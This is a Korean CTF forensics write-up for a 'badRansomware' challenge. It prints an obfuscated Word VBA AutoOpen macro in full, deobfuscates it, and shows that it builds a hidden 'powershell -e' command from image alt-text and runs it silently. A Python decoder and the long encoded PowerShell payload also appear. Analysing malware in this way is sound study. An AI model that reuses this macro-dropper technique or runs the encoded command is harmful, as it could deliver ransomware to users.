티스토리 뷰
728x90
반응형
badRansomware (325) - Forensics
Microsoft Word 형태의 파일이 주어졌습니다. 포렌식 문제에서 제일 첫번째 문제였는데, 사전 준비가 미흡하여 Microsoft Word 를 설치하는 데 시간이 걸렸고, 정품인증안해서 다시 삭제하고 무료 오피스를 찾다가 Libre Office 라는 걸 알게되서 다시 설치하고 하는데 거의 시간을 다 소비했던 허무한 문제였습니다. 그래도 한 문제라도 풀어보자라는 생각에 차분히 설치를 다하고 파일을 열어보았습니다.
문제 파일을 열어보면 위와 같은 이미지 두 개가 위아래로 배치되어 있습니다. 그리고 처음에 실행하면 백신이 매크로를 탐지했다고 매크로를 파일에서 지워버립니다.
그래서 백신의 실시간 감시를 잠시 해제하고서, 다시 실행하면 오피스 프로그램에서 매크로를 일시적으로 차단했다고 경고가 나옵니다. 이것도 마저 해제시켜주고 매크로 편집기에 들어가봤습니다.
그럼 위와 같은 코드가 나옵니다. VBA 스크립트 언어로 구성되어져 있습니다. 그리고 언뜻 보면 난독화가 되어 있는 걸 볼 수 있습니다. 그래서 코드 가독성을 위해서 일단 난독화 해제를 위해 코드 분석을 해보았습니다. 우선 제일 처음에는 Sleep 0 이라는 무의미한 코드를 제거했습니다.
Rem Attribute VBA_ModuleType=VBAModule
Option VBASupport 1
Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Sub AutoOpen()
Dim lqijdaihdm, ozmuxxvcfj
lqijdaihdm = 219
ozmuxxvcfj = 11 / Tan(lqijdaihdm)
Dim nxvrbjohlp
Dim bhofyfqsep, qfqgcgzjyw
bhofyfqsep = 213
qfqgcgzjyw = 2 / Tan(bhofyfqsep)
nxvrbjohlp = ActiveDocument.Shapes("pelxcitrdd").AlternativeText
Dim flodmtaypj, jvlnaehckw
flodmtaypj = 216
jvlnaehckw = 16 / Tan(flodmtaypj)
nxvrbjohlp = ActiveDocument.Shapes("adaopiwer").AlternativeText & nxvrbjohlp
Dim cfojvvygsc, kusmewpqle
cfojvvygsc = 142
kusmewpqle = 7 / Tan(cfojvvygsc)
Dim hxeayqcjkw
Dim mpjdkfcpwy, pwskaanarc
mpjdkfcpwy = 176
pwskaanarc = 3 / Tan(mpjdkfcpwy)
hxeayqcjkw = "@@@"
Dim sakzfltqsd, tmjquuqxcn
sakzfltqsd = 114
tmjquuqxcn = 13 / Tan(sakzfltqsd)
nxvrbjohlp = Split(nxvrbjohlp, hxeayqcjkw)
Dim xdbhkftuxy, xfmydgoyhg
xdbhkftuxy = 244
xfmydgoyhg = 7 / Tan(xdbhkftuxy)
Dim gvkbqsplby
Dim fvhgsaanbr, mlxrgwziup
fvhgsaanbr = 164
mlxrgwziup = 20 / Tan(fvhgsaanbr)
gvkbqsplby = 0
Dim rwruwadwii, zlhnhmondv
rwruwadwii = 261
zlhnhmondv = 9 / Tan(rwruwadwii)
Dim qtlapbphgi
Dim yjxjcijsmy, cnvhrfgahf
yjxjcijsmy = 142
cnvhrfgahf = 6 / Tan(yjxjcijsmy)
qtlapbphgi = UBound(nxvrbjohlp) - 1
Dim vcagzoujxg, tmxbnkwhov
vcagzoujxg = 299
tmxbnkwhov = 20 / Tan(vcagzoujxg)
Dim zxzflmeecx
For E = gvkbqsplby To qtlapbphgi
Dim qyexnwafyb, hhxzrzkunq
qyexnwafyb = 209
hhxzrzkunq = 12 / Tan(qyexnwafyb)
Dim otfyqjyayp
Dim uagvycagqv, sqqsddtdeo
uagvycagqv = 193
sqqsddtdeo = 6 / Tan(uagvycagqv)
Dim jqdtyohplz
Dim kfjpmnjmnk, trgorcjrzg
kfjpmnjmnk = 121
trgorcjrzg = 8 / Tan(kfjpmnjmnk)
otfyqjyayp = nxvrbjohlp(E)
Dim izzwsqycpd, sgptfleqdc
izzwsqycpd = 144
sgptfleqdc = 14 / Tan(izzwsqycpd)
jqdtyohplz = ChrW(otfyqjyayp)
Dim iehqtgzbix, dimapxqodt
iehqtgzbix = 281
dimapxqodt = 11 / Tan(iehqtgzbix)
zxzflmeecx = zxzflmeecx & jqdtyohplz
Dim zgtmroijyp, qgohafconv
zgtmroijyp = 127
qgohafconv = 19 / Tan(zgtmroijyp)
Next
Dim uhykmvhjep, sbplkxtzdh
uhykmvhjep = 164
sbplkxtzdh = 20 / Tan(uhykmvhjep)
zxzflmeecx = "ell -e IAB" & zxzflmeecx
Dim nmcjkawjha, ssykbvliaz
nmcjkawjha = 124
ssykbvliaz = 16 / Tan(nmcjkawjha)
zxzflmeecx = "wersh" & zxzflmeecx
Dim bxjbolkxwx, zkvbaocdar
bxjbolkxwx = 140
zkvbaocdar = 7 / Tan(bxjbolkxwx)
zxzflmeecx = "po" & zxzflmeecx
Dim hywymasgnh, axfgmhjfgt
hywymasgnh = 168
axfgmhjfgt = 13 / Tan(hywymasgnh)
Call Shell(zxzflmeecx, 0)
Dim zrekfillik, gxwbfbnogb
zrekfillik = 181
gxwbfbnogb = 14 / Tan(zrekfillik)
Dim rflodrfqdx, rtkvsswpoh
rflodrfqdx = 123
rtkvsswpoh = 15 / Tan(rflodrfqdx)
End Sub
두번째로는 아래와 같이 변수를 선언하고 그 변수에 값을 대입하고 그 이후에 아무런 영향을 미치지 않는 의미없는 연산을 하는 코드를 제거했습니다. (정규식 : Dim \w{10}, \w*\n\w{10} = \d{3}\n\w{10} = .*)
Dim lqijdaihdm, ozmuxxvcfj
lqijdaihdm = 219
ozmuxxvcfj = 11 / Tan(lqijdaihdm)
결과적으로 아래와 같은 코드가 됩니다.
Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Sub AutoOpen()
Dim nxvrbjohlp
nxvrbjohlp = ActiveDocument.Shapes("pelxcitrdd").AlternativeText
nxvrbjohlp = ActiveDocument.Shapes("adaopiwer").AlternativeText & nxvrbjohlp
Dim hxeayqcjkw
hxeayqcjkw = "@@@"
nxvrbjohlp = Split(nxvrbjohlp, hxeayqcjkw)
Dim gvkbqsplby
gvkbqsplby = 0
Dim qtlapbphgi
qtlapbphgi = UBound(nxvrbjohlp) - 1
Dim zxzflmeecx
For E = gvkbqsplby To qtlapbphgi
Dim otfyqjyayp
Dim jqdtyohplz
otfyqjyayp = nxvrbjohlp(E)
jqdtyohplz = ChrW(otfyqjyayp)
zxzflmeecx = zxzflmeecx & jqdtyohplz
Next
zxzflmeecx = "ell -e IAB" & zxzflmeecx
zxzflmeecx = "wersh" & zxzflmeecx
zxzflmeecx = "po" & zxzflmeecx
Call Shell(zxzflmeecx, 0)
End Sub
그리고 다시 위 코드 중 변수 이름은 좀 더 의미있게 하고, 불필요한 반복사용되는 변수는 상수로 변경하는 방식으로 좀 더 명확한 코드로 변환했습니다.
Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Sub AutoOpen()
Dim image_str
image_str = ActiveDocument.Shapes("pelxcitrdd").AlternativeText
image_str = ActiveDocument.Shapes("adaopiwer").AlternativeText & image_str
image_str = Split(image_str, "@@@")
Dim command_str
For E = 0 To UBound(image_str) - 1
Dim splitted_str
Dim char_str
splitted_str = image_str(E)
char_str = ChrW(splitted_str)
command_str = command_str & char_str
Next
command_str = "powershell -e IAB" & command_str
Call Shell(command_str, 0)
End Sub
마지막으로 ActiveDocument.Shapes(““).AlternativeText 가 무엇인지 Microsoft Word VBA 문서를 찾아보았더니 어떤 모양의 대체 텍스트라고 했습니다. 그 텍스트는 아래에서 찾아볼 수 있습니다. 이미지를 우측 클릭하고 속성에서 선택 사항 탭에서 도형(모양)의 이름과 설명을 확인할 수 있습니다.
다시 이 부분을 코드에 반영한 것이 아래와 같습니다. 너무 길어서 생략했습니다.
Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Sub AutoOpen()
Dim image_str
image_str = "4@@@81@@@65@@@120@@@65@@@68...(생략)"
image_str = "74@@@65@@@69@@@85@@@65@@@87...(생략)" & image_str
image_str = Split(image_str, "@@@")
Dim command_str
For E = 0 To UBound(image_str) - 1
Dim splitted_str
Dim char_str
splitted_str = image_str(E)
char_str = ChrW(splitted_str)
command_str = command_str & char_str
Next
command_str = "powershell -e IAB" & command_str
Call Shell(command_str, 0)
End Sub
이렇게 코드를 변환하고 나니 코드가 좀 더 명확해졌고, 제일 하단에 Call Shell 함수를 호출하여 powershell 명령을 실행시키는 것을 확인할 수 있습니다. 그래서 해당 명령을 수행시키면 랜섬웨어가 작동하는 것이니, 저는 완성된 command 문자열만 확인하기 위해서 보다 친숙한 python 으로 코드를 짜서 해당 command 문자열을 확인하였습니다.
image_str = "4@@@81@@@65@@@120@@@65@@@68@@@69@@@65@@@77@@@81...(생략)"
image_str = "74@@@65@@@69@@@85@@@65@@@87@@@65@@@65@@@111@@@65...(생략)"+image_str
image_str = image_str.split("@@@")
command_str = ""
for E in image_str:
char_str = chr(int(E))
command_str = command_str + char_str
command_str = "powershell -e IAB" + command_str
print(command_str)
그리고 출력 결과 아래와 같습니다.
powershell -e IABJAEUAWAAoACAALQBqAG8AaQBOACgAJwAzADYAdwA5ADcAJQAzADIAcAA2ADEAfQAzADIAWAAzADQASQAzADYAYwA3ADIAYwA3ADkAJQA3ADcAfQA2ADkAdwA5ADIAJQA5ADIASQAxADAAMABNADEAMQAxAFUAMQAxADkAWAAxADEAMABVADEAMAA4AHcAMQAxADEAVQA5ADcATQAxADAAMABYADEAMQA1AH0AMwA0AHcAMQAzAH0AMQAwAHAAMQAzAH0AMQAwAFgAOQAxAFgAOAAyAGMAMQAwADEAfQAxADAAMgB3ADEAMAA4AHcAMQAwADEAUgA5ADkASQAxADEANgBJADEAMAA1AFUAMQAxADEATQAxADEAMABNADQANgBNADYANQBSADEAMQA1AHcAMQAxADUAdwAxADAAMQBVADEAMAA5AE0AOQA4AEkAMQAwADgAVQAxADIAMQBVADkAMwB9ADUAOAB3ADUAOABwADQAMABwADMAOQB3ADcANgAlADEAMQAxAFUAMwA5ACUANAAzAFUAMwA5AEkAOQA3AH0AMQAwADAAJQA3ADAAVQAxADAANQBjADMAOQB3ADQAMwB3ADMAOQBjADEAMAA4AEkAMQAwADEATQAzADkAfQA0ADEAYwA0ADYAYwA3ADMASQAxADEAMABjADEAMQA4AHAAMQAxADEAfQAxADAANwBVADEAMAAxAHcANAAwAE0ANAAwAH0ANAAwAFUANAAwAFUAMwA0AHcAMQAyADMAdwA0ADgAWAAxADIANQBVADEAMgAzAHcANAA5AHAANQAzAGMAMQAyADUAVQAxADIAMwBSADQAOQBYADUAMAAlADEAMgA1AFUAMQAyADMAVQA0ADkAdwA0ADgAJQAxADIANQB3ADEAMgAzAEkANQAxAHcAMQAyADUAWAAxADIAMwBJADQAOQBNADUAMgB9ADEAMgA1AGMAMQAyADMAYwA0ADkAVQA1ADQAVQAxADIANQB9ADEAMgAzAE0ANQA3AHcAMQAyADUAcAAxADIAMwBVADUAMgBwADEAMgA1AHAAMQAyADMASQA1ADAAVQAxADIANQBNADEAMgAzACUANAA5AH0ANAA5AE0AMQAyADUAfQAxADIAMwAlADQAOQBYADUAMQAlADEAMgA1AHcAMQAyADMAYwA1ADQAfQAxADIANQBjADEAMgAzAE0ANQAzAH0AMQAyADUATQAxADIAMwB3ADUANgBJADEAMgA1AFIAMQAyADMAdwA0ADkAVQA1ADUAcAAxADIANQBjADEAMgAzAGMANAA5AEkAMQAyADUATQAxADIAMwBjADUANQBVADEAMgA1AE0AMwA0AFgANAA1AHcAMQAwADIAVQAzADIAcAAzADkAUgA2ADcAUgA1ADgASQAxADAANwAlADkAOAB3ADUAMQB3ADgANwBwADcAMwBYADMAOQAlADQANAB9ADMAOQBwADkAOABJADMAOQBwADQANAAlADMAOQAlADEAMQA5AFIAMQAxADEAYwAxADEANAB3ADMAOQAlADQANAAlADMAOQBSADEAMAAyAH0AMQAxADYATQAzADkAdwA0ADQAdwAzADkAcAA5ADgATQA1ADEATQA3ADAAcAAxADEANAB9ADkANwB9ADEAMAA5AFgAMQAwADEAVQAzADkAdwA0ADQAfQAzADkATQA4ADMAUgAxADIAMQBJADEAMQA1ACUAMQAxADYAYwAxADAAMQAlADMAOQBJADQANAAlADMAOQBjADkAOABVADUAMQBYADMAOQBjADQANABJADMAOQBJADQANgBwADEAMAAwAGMAMQAwADgAcAAxADAAOABVADMAOQBSADQANABJADMAOQBNADEAMAA5AFIAMwA5AHcANAA0AGMAMwA5AFIAOAA0AFgAMQAwADcAdwAzADkAVQA0ADQAYwAzADkASQA5ADgAVQA1ADEAdwA3ADcAdwAxADAANQBjADkAOQBJADEAMQA0AFUAMQAxADEASQAxADEANQB9ADEAMQAxAH0AMwA5AHAANAA0AGMAMwA5AE0AMQAwADcAWAAxADAANwB9ADMAOQBwADQANABjADMAOQBNADgAMwBVADEAMAA3AH0AMwA5AEkANAA0AHcAMwA5AEkAOQA4AHcANQAxAFUAMQAxADgAJQA1ADAAcAA0ADYAfQA0ADgATQA0ADYATQA1ADMAJQA0ADgAWAA1ADUAVQA1ADAAVQA1ADUAJQAxADAANwBVADMAOQBVADQANABYADMAOQBwADQANgBSADMAOQAlADQANABwADMAOQB9ADcAOABVADYAOAB3ADcAOQBVADgANwB9ADMAOQB9ADQANABJADMAOQBwADcAOABwADYAOQBwADMAOQB3ADQANABYADMAOQBNADQANgB9ADgANwBSADEAMAAxAFgAMwA5AHcANAAxAHcANAAxAFUANAA2AGMAMwA0AFgAOAAyAH0ANgA5AFUAMQAxADIASQA5ADYAJQA3ADYAWAA5ADcAcAA5ADkASQAxADAAMQAlADMANABYADQAMABVADQAMABJADkAMQBJADYANwBSADcAMgBSADkANwBJADgAMgBSADkAMwBwADQAOQBwADQAOABjADUANQB9ADQAMwBSADkAMQBYADYANwBYADcAMgBSADkANwB3ADgAMgB3ADkAMwAlADUANwBwADUANgBSADQAMwB9ADkAMQBNADYANwB3ADcAMgB3ADkANwBSADgAMgBwADkAMwBJADUAMwBwADQAOQAlADQAMQAlADQANABNADkAMQB9ADEAMQA1AEkAMQAxADYAJQAxADEANABVADEAMAA1AFgANwA4AHcAMQAwADMAcAA5ADMAdwA5ADEAJQA2ADcASQA3ADIAUgA5ADcASQA4ADIATQA5ADMAYwA1ADcAVQA1ADAAWAA0ADEASQA0ADEASQA0ADEASQAzADIAWAAxADIANABYADMAMgB3ADMAOABSADQAMABjADMANABSADEAMgAzAFgANAA4AH0AMQAyADUAfQAxADIAMwAlADQAOQBjADEAMgA1AFgAMwA0AHAAMwAyAH0ANAA1AGMAMQAwADIAcAAzADIAVQAzADkASQAxADEAMQBjADEAMQA3AFgAMQAxADYAcAA0ADUAJQAzADkATQA0ADQAdwAzADkAYwAxADEAMAAlADEAMQA3AFUAMQAwADgAWAAxADAAOABJADMAOQBNADQAMQB9ADEAMwBjADEAMABNADEAMwBNADEAMAB3ADEAMwB3ADEAMAB9ADQANgBNADQAMAAlADMANABVADEAMgAzAFgANQAwAFIAMQAyADUAUgAxADIAMwBjADQAOQBVADEAMgA1AH0AMQAyADMAfQA0ADgAWAAxADIANQAlADMANABVADMAMgBSADQANQBSADEAMAAyAHcAMwA5AFUANAA1AFUANgA3AE0AMQAwADQAJQAxADAANQBJADEAMAA4AHAAMQAwADAASQA3ADMATQAxADEANgBSADEAMAAxAFIAMQAwADkAdwAzADkASQA0ADQAYwAzADkAJQAxADAAMQBNADEAMQA2AEkAMwA5AGMANAA0ACUAMwA5AH0ANwAxAH0AMwA5AEkANAAxAE0AMwAyACUANAA1ACUAOAAwAFIAOQA3AFUAMQAxADYATQAxADAANABwADMAMgBJADMANgBJADkANwAlADMAMgBwADEAMgA0AGMAMwAyACUAMwA4AH0ANAAwAH0AMwA0AHcAMQAyADMAVQA1ADAAYwAxADIANQBYADEAMgAzACUANAA4AFgAMQAyADUAdwAxADIAMwBNADQAOQBVADEAMgA1AGMAMwA0AH0ANAA1AFIAMQAwADIAfQAzADkAfQA5ADkAVQAxADAANABJADQANQBVADcAOQBVADkAOABNADMAOQBwADQANAB9ADMAOQBJADEAMAA2AFUAMQAwADEAYwA5ADkAcAAxADEANgAlADMAOQBYADQANAB9ADMAOQB9ADcAMABNADEAMQAxAFUAMQAxADQAdwAxADAAMQBjADkANwB3ADMAOQB9ADQAMQBYADMAMgBwADEAMgAzAEkAMQAzAFgAMQAwAE0AOQAlADMANgAlADEAMAAxAGMAMQAxADQAcAAxADEANgBSADMAMgB3ADYAMQBwADMAMgBwADMANgBVADkANQAlADQANgBwADMANABYADcAMAB3ADgANQBjADkANgBJADcANgAlADcANgB3ADEAMQAwAGMANgA1AFgANwA3AEkANgA5ACUAMwA0AFIAMwAyAE0ANAAzAFUAMwAyAHcANAAwAHcAMwA0AHcAMQAyADMAfQA0ADgAfQAxADIANQBNADEAMgAzAFgANAA5AHcAMQAyADUAUgAxADIAMwB3ADUAMABYADEAMgA1AH0AMwA0AHAANAA1AFIAMQAwADIAYwAzADIAcAAzADkATQA0ADYAJQAxADAAMQBSADMAOQBJADQANAB9ADMAOQBwADEAMQAwAFIAMwA5ACUANAA0AHcAMwA5AE0AOQA5AH0AMQAwADEAVQAxADAAMABwADMAOQBJADQAMQBSADEAMwBVADEAMAAlADkAVQAzADYAYwAxADEANQAlADEAMQA2AGMAMQAxADcASQAxADAAMgB3ADEAMAAyAFgAMwAyAHAANgAxAFUAMwAyAFUAMwA4AFgANAAwAFUAMwA0ACUAMQAyADMATQA0ADkASQAxADIANQBjADEAMgAzAEkANQAwAFIAMQAyADUAWAAxADIAMwAlADQAOABJADEAMgA1AFgAMwA0AH0ANAA1AFUAMQAwADIAdwAzADkAVQAxADEANgBSADMAOQBSADQANABVADMAOQBNADcAMQBYADEAMAAxACUAMQAxADYATQA0ADUAWAA2ADcAWAAxADEAMQBNADEAMQAwAEkAMwA5AFUANAA0AFUAMwA5AH0AMQAxADYATQAxADAAMQB3ADEAMQAwAFIAMwA5ACUANAAxAFIAMwAyAFUAMwA2ACUAOQA1AHAANAA2AEkAMwA0AE0AMQAwADIAYwAxADEANwB9ADkANgB3ADcANgBJADEAMAA4AFIAMQAxADAATQA5ADcAYwA3ADcAVQAxADAAMQBNADMANABYADEAMwBJADEAMAB9ADkAfQAxADMATQAxADAAcAA5AHAAMwA2AFUAMQAwADAAdwAxADEANABNADEAMQA2ACUAMwAyAH0ANgAxAHcAMwAyAEkAOQAxAH0AOAAzAGMAMQAyADEAJQAxADEANQBVADEAMQA2AHAAMQAwADEAfQAxADAAOQBNADQANgBwADYANwB3ADEAMQAxAHAAMQAxADAAVQAxADEAOABNADEAMAAxAE0AMQAxADQAWAAxADEANgBNADkAMwBJADUAOABYADUAOABYADQAMAB9ADMAOQB9ADcAMAB9ADMAOQBYADQAMwB3ADMAOQBYADEAMQA0AHcAMQAxADEAYwAxADAAOQAlADYANgBjADkANwBYADEAMQA1ACUAMQAwADEATQAzADkAYwA0ADMASQAzADkAfQA1ADQAWAAzADkAJQA0ADMAVQAzADkAfQA1ADIAdwA4ADMAdwAxADEANgAlADEAMQA0AH0AMQAwADUASQAxADEAMABNADMAOQBJADQAMwB3ADMAOQBjADEAMAAzAE0AMwA5AE0ANAAxAFgANAA2AEkANwAzAGMAMQAxADAAVQAxADEAOABwADEAMQAxAEkAMQAwADcAfQAxADAAMQBYADQAMABVADQAMAAlADMANAAlADEAMgAzACUANAA4AEkAMQAyADUAJQAxADIAMwBJADUAMQAlADEAMgA1AFIAMQAyADMAJQA1ADAAfQAxADIANQBVADEAMgAzAFIANAA5AFIAMQAyADUAWAAxADIAMwBSADUAMwBJADEAMgA1AHAAMQAyADMAcAA1ADIASQAxADIANQBSADMANABVADQANQBYADEAMAAyAFgAMwAyAHcAMwA5AFIAOAAzAFUANwAwAE0AMwA5AFIANAA0AH0AMwA5AHAANAA4AGMAOQA4AH0AMQAxADAAdwA3ADcAVQAxADEAOQBNADkAOABwADgANABYADcAOAB9ADUAMQAlADkANwAlADYAOABSADcAOABwADgAMwBYADMAOQBwADQANAB3ADMAOQBwADcAMwB3ADMAOQBJADQANABNADMAOQBNADgAMgB9ADYANwBNADEAMAAxAFUANQAxAHcAMwA5AEkANAA0AHcAMwA5AHcAOAAxAGMANgAxAE0ANgAxAH0AMwA5ACUANAA0AH0AMwA5ACUAMQAwADIAVQAzADkAfQA0ADEAdwA0ADEATQAxADMAdwAxADAAfQA5ACUAMwA2AHcAMQAxADQAUgAzADIAUgA2ADEATQAzADIAcAAzADgAUgA0ADAAfQAzADQAWAAxADIAMwBNADUAMABYADEAMgA1AFIAMQAyADMATQA0ADkAYwAxADIANQBwADEAMgAzAFgANAA4AEkAMQAyADUASQAxADIAMwBjADUAMQB3ADEAMgA1AEkAMwA0AHcAMwAyAFUANAA1AFgAMQAwADIAJQAzADIAdwAzADkAdwA5ADgAdwAzADkAVQA0ADQAVQAzADkAVQA3ADkASQAzADkAWAA0ADQAWAAzADkAJQAxADEAMABwADEAMAAxAE0AMQAxADkAfQA0ADUAYwAzADkAUgA0ADQAJQAzADkAUgAxADAANgBYADEAMAAxAHAAOQA5AFUAMQAxADYAYwAzADkAcAA0ADEASQAzADIAVQA0ADAAcAAzADQAcAAxADIAMwBwADQAOQBwADQAOAAlADEAMgA1AFIAMQAyADMAUgA1ADMAUgAxADIANQBjADEAMgAzAGMANAA5AFUAMQAyADUAVQAxADIAMwBVADQAOABSADEAMgA1AE0AMQAyADMAYwA1ADcAWAAxADIANQBYADEAMgAzAHAANQAxAFIAMQAyADUASQAxADIAMwB9ADUANABNADEAMgA1AE0AMQAyADMAYwA1ADUAUgAxADIANQB9ADEAMgAzAFIANQAwAFUAMQAyADUAfQAxADIAMwBjADUAMgBwADEAMgA1AFgAMQAyADMAdwA1ADYAfQAxADIANQB9ADMANAB3ADQANQBNADEAMAAyAFUAMwA5AHAAMQAwADEAYwA5ADkAJQAxADEANwBYADEAMQA0AFgAMQAwADUAcAAxADEANgB3ADMAOQB3ADQANAB3ADMAOQBVADQANgBVADgAMwB9ADMAOQBVADQANABJADMAOQB9ADEAMAAwAGMAOQA3AFIAMQAwADEATQAzADkAfQA0ADQAYwAzADkASQAxADAAMwB3ADEAMQA0AFUAMwA5AFIANAA0AEkAMwA5AHAAMQAwADgATQA3ADcASQA5ADcASQAxADEAMABjADMAOQBJADQANABSADMAOQBVADEAMgAxACUAMQAxADUAJQAxADEANgBJADEAMAAxAHcAMQAwADkAWAAzADkATQA0ADQAJQAzADkATQA5ADcAcAAxADEAMgB9ADEAMAA0AH0AMQAyADEAfQA0ADYATQA4ADIAdwAxADAANQBSADEAMAA2AFIAMwA5AHcANAA0ACUAMwA5AFgAMQAxADAAJQAzADkAUgA0ADQAVQAzADkAYwA5ADcAVQAxADAAMwB9ADEAMAAxAHcAMQAwADAAUgAzADkATQA0ADQAYwAzADkAfQAxADIAMQBSADQANgAlADYANwB3ADEAMQA0AGMAMQAyADEAVQAxADEAMgB9ADEAMQA2AEkAMQAxADEAfQAzADkAVQA0ADQAUgAzADkAJQA4ADMAVQAzADkAdwA0ADEAWAAzADIAUgAxADMAVQAxADAAdwA5AGMAMwA2AEkAOQA5AHAAMwAyAH0ANgAxAEkAMwAyAFgAMwA2AGMAMQAxADQASQA0ADYASQA0ADAAdwAzADkAfQA2ADcAcAAxADEANABwADEAMAAxAFIAMwA5AEkANAAzAGMAMwA5AFgAOQA3AH0AMQAxADYAdwAxADAAMQBjADYAOQBwADEAMQAwAEkAMwA5AEkANAAzAFIAMwA5AFUAOQA5AH0AMQAxADQATQAxADIAMQAlADMAOQAlADQAMwB3ADMAOQBJADEAMQAyAFUAMQAxADYAYwAxADEAMQBwADMAOQAlADQAMwBNADMAOQBNADEAMQA0AFgAMwA5AGMANAAxACUANAA2AHAANwAzAFUAMQAxADAAfQAxADEAOAB9ADEAMQAxAEkAMQAwADcAWAAxADAAMQBVADQAMABSADMANgBYADEAMAAwACUAMQAxADQAUgAxADEANgBSADQANAAlADMAMgBVADQAMABjADQAOQBwADQANgBSADQANgBjADQAOQBNADUANABVADQAMQBwADQAMQBjADEAMwBNADEAMABSADkAVQAzADYAdwAxADAAOQBJADEAMQA1AE0AMwAyAH0ANgAxAFIAMwAyAFgAMwA4AFUANAAwAE0AMwA0AGMAMQAyADMAcAA1ADAAcAAxADIANQBSADEAMgAzACUANAA5AEkAMQAyADUAJQAxADIAMwAlADQAOAAlADEAMgA1AFUAMwA0AEkANAA1AFgAMQAwADIATQAzADIATQAzADkAcAA5ADkAVQAxADEANgBwADMAOQBYADQANABjADMAOQB3ADkAOABJADEAMAA2AGMAMQAwADEAfQAzADkAdwA0ADQAJQAzADkAYwAxADEAMABJADEAMAAxAFUAMQAxADkAdwA0ADUASQA3ADkAYwAzADkAVQA0ADEAUgAzADIAUgA0ADAAWAAzADQAUgAxADIAMwBNADUAMQB3ADEAMgA1AHAAMQAyADMAUgA0ADkAfQAxADIANQAlADEAMgAzACUANAA4AGMAMQAyADUASQAxADIAMwBjADUAMAB3ADEAMgA1AH0AMwA0AGMANAA1AFUAMQAwADIAYwAzADIAUgAzADkAUgAxADEANgBSADMAOQBjADQANABVADMAOQBwADcAOQBJADQANgBSADcANwAlADEAMAAxAFUAMQAwADkASQAxADEAMQB3ADEAMQA0ACUAMQAyADEATQA4ADMASQAzADkAVQA0ADQATQAzADkAVQAxADEANABJADEAMAAxAHAAOQA3AH0AMQAwADkAcAAzADkAVQA0ADQATQAzADkATQA3ADMAUgAzADkAdwA0ADEASQAxADMAYwAxADAAcAA5AHAAMwA2AEkAOQA5AH0AMQAxADUAVQAzADIAcAA2ADEAcAAzADIAfQAzADgATQA0ADAAVQAzADQAWAAxADIAMwBSADQAOABYADEAMgA1AFgAMQAyADMAfQA0ADkASQAxADIANQB9ADEAMgAzAH0ANQAwAFgAMQAyADUAYwAzADQAWAAzADIAUgA0ADUAYwAxADAAMgBjADMAOQBVADEAMQAwAH0AMwA5ACUANAA0AHcAMwA5AFgAMQAwADEAVQAxADEAOQBSADQANQBNADMAOQB9ADQANABJADMAOQBjADcAOQBNADkAOABVADEAMAA2AFgAMQAwADEATQA5ADkAcAAxADEANgAlADMAOQB9ADQAMQBYADMAMgBSADQAMABJADMANABjADEAMgAzAH0ANQAwAGMAMQAyADUATQAxADIAMwBwADUAMgBjADEAMgA1AFUAMQAyADMAcAA1ADMAVQAxADIANQBJADEAMgAzAEkANAA4AH0AMQAyADUAVQAxADIAMwB9ADUANQBYADEAMgA1AFIAMQAyADMAVQA0ADkAYwAxADIANQB3ADEAMgAzAFUANQA3AE0AMQAyADUATQAxADIAMwBYADUAMQBJADEAMgA1AHAAMQAyADMAJQA1ADYASQAxADIANQBwADEAMgAzAEkANQA0AFgAMQAyADUAfQAzADQAfQAzADIAfQA0ADUASQAxADAAMgBjADMAOQB9ADYANwBNADEAMQA0AEkAMQAyADEAdwAzADkAfQA0ADQAcAAzADkATQAxADAAMwBJADMAOQB3ADQANAB3ADMAOQB3ADgAMwBYADMAOQAlADQANABjADMAOQBJADYANwB3ADEAMQA0AEkAMQAyADEAdwAxADEAMgBYADEAMQA2AE0AMwA5AFgANAA0AHcAMwA5AFgAMQAwADEATQA5ADkAdwAxADEANwBJADEAMQA0AH0AMQAwADUASQAzADkAYwA0ADQASQAzADkAUgAxADEANgAlADEAMgAxACUANAA2AHAAMwA5AHcANAA0AFgAMwA5AFUAOQA3ACUAMQAwADkAJQAzADkAfQA0ADQAcAAzADkAJQAxADEAMgB9ADEAMQA2ACUAMQAxADEAdwAzADkAdwA0ADQASQAzADkAfQAxADEAMQB3ADgAMwBJADEAMQA2ACUAMQAxADQAUgAxADAAMQBSADMAOQBYADQANABNADMAOQAlADEAMQA0AE0AOQA3AHAAMQAxADIAWAAxADAANABYADEAMgAxAEkANAA2AFUAMwA5AE0ANAAxACUAMwAyAEkAMwA2AFIAMQAwADkATQAxADEANQB3ADQANABVADMANgBjADkAOQBYADQANABjADQAMABjADMANABSADEAMgAzAFgANAA4AGMAMQAyADUAVQAxADIAMwBNADQAOQBNADEAMgA1AE0AMwA0AHAANAA1AFgAMQAwADIAYwAzADkAcAA4ADcASQAzADkAWAA0ADQAYwAzADkAcAAxADEANAB3ADEAMAA1AFgAMQAxADYAdwAxADAAMQBJADMAOQBVADQAMQB9ADEAMwBVADEAMABYADkAVQAzADYATQAxADEANQBNADEAMQA5AHcAMwAyAFgANgAxACUAMwAyAEkAMwA4ACUANAAwAH0AMwA0ACUAMQAyADMAVQA0ADkASQAxADIANQBNADEAMgAzAH0ANQAwAFgAMQAyADUATQAxADIAMwBjADQAOABwADEAMgA1AFIAMwA0AHcANAA1AE0AMQAwADIAWAAzADIAfQAzADkATQAxADEANgBNADMAOQBjADQANABSADMAOQB3ADEAMQAwAEkAMQAwADEAUgAxADEAOQAlADMAOQB3ADQANAB3ADMAOQBYADQANQBVADcAOQB9ADkAOABSADEAMAA2AFUAMQAwADEAcAA5ADkAJQAzADkAVQA0ADEAWAAzADIAcAA0ADAAUgAzADQAdwAxADIAMwB3ADQAOAAlADEAMgA1AGMAMQAyADMAYwA1ADAASQAxADIANQBjADEAMgAzAFIANQAyAEkAMQAyADUAcAAxADIAMwBJADQAOQBwADEAMgA1AFgAMQAyADMASQA1ADEAYwAxADIANQB9ADMANABJADMAMgBwADQANQBwADEAMAAyAGMAMwAyAGMAMwA5AEkANwAzAEkANwA5AHAAMwA5AEkANAA0AH0AMwA5AGMAOQA3AHAAMQAwADkAUgAzADkAVQA0ADQAWAAzADkASQA0ADYAfQA4ADMAcAAxADEANgAlADEAMQA0AE0AMwA5AHAANAA0AE0AMwA5AEkAOAA3AFIAMQAxADQAdwAxADAANQBVADEAMQA2AHAAMQAwADEASQAxADEANABJADMAOQBwADQANABwADMAOQB3ADEAMAAxAE0AMwA5AH0ANAAxACUAMwAyAFgAMwA2AH0AOQA5AHcAMQAxADUAdwAxADMAYwA